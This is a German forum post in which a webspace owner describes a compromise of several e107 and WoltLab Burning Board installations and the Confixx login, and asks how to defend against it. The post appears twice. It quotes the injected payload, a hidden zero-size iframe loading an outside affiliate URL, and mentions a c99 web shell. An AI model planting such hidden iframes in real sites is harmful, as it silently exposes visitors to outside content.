Mein Webspace erlag letzter Nacht einer "Wurm-Attacke" oder was immer das war.
So gegen 5.00 Uhr morgens entdeckte ich beim installieren eines neuen CMS (e107) einige Ungereimtheiten beim installieren.
Im ACP bekam ich die Meldung, dass 2 Files in einem Ordner waren, die da nicht hingehören.
Beim genaueren hinsehen machte sich schon das ausmaß der Zerstörung sichtbar.
In 2 CMS (e107 Mainseite und Subdomain), sowie in 3 Woltlab Burning Boards 2.3.6 pl1 (acp htaccess) waren mit folgendem code verseucht:
Der code ist c.a. 10 mal "eingebaut"
Habe 2 Stunden die Serverlogfiles durchsucht, obs Zugriffe auf eine evtl. installierte Shell gab.
Also ich mich ins confixx einloggen wollte (so gegen 10 Uhr heute morgen), musste ich feststellen, dass sogar der Login darin infiziert war.
Meine Frage jetzt - welche Möglichkeiten habe ich um mich gegen solche Angriffe zu schützen.
Kann es sein, dass "der Wurm" evtl. über eine eingeschleuste Shell auf den Webspace kam?
Der ganze Server scheint infiziert zu sein (habe ja wie gesagt nur Webspace).
Global_Register ist Serverseitig auf off gestellt und beim überprüfen des Stammverzeichnisses mit einer c99 Shell wurde der status secure angezeigt.
Eine wirklich ärgerliche Sache, die mir echt auf den Magen schlägt ( und auf meine Schlafgewohnheiten, bin immmer noch wach ... )
So gegen 5.00 Uhr morgens entdeckte ich beim installieren eines neuen CMS (e107) einige Ungereimtheiten beim installieren.
Im ACP bekam ich die Meldung, dass 2 Files in einem Ordner waren, die da nicht hingehören.
Beim genaueren hinsehen machte sich schon das ausmaß der Zerstörung sichtbar.
In 2 CMS (e107 Mainseite und Subdomain), sowie in 3 Woltlab Burning Boards 2.3.6 pl1 (acp htaccess) waren mit folgendem code verseucht:
Code:
html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Der code ist c.a. 10 mal "eingebaut"
Habe 2 Stunden die Serverlogfiles durchsucht, obs Zugriffe auf eine evtl. installierte Shell gab.
Also ich mich ins confixx einloggen wollte (so gegen 10 Uhr heute morgen), musste ich feststellen, dass sogar der Login darin infiziert war.
Meine Frage jetzt - welche Möglichkeiten habe ich um mich gegen solche Angriffe zu schützen.
Kann es sein, dass "der Wurm" evtl. über eine eingeschleuste Shell auf den Webspace kam?
Der ganze Server scheint infiziert zu sein (habe ja wie gesagt nur Webspace).
Global_Register ist Serverseitig auf off gestellt und beim überprüfen des Stammverzeichnisses mit einer c99 Shell wurde der status secure angezeigt.
Eine wirklich ärgerliche Sache, die mir echt auf den Magen schlägt ( und auf meine Schlafgewohnheiten, bin immmer noch wach ... )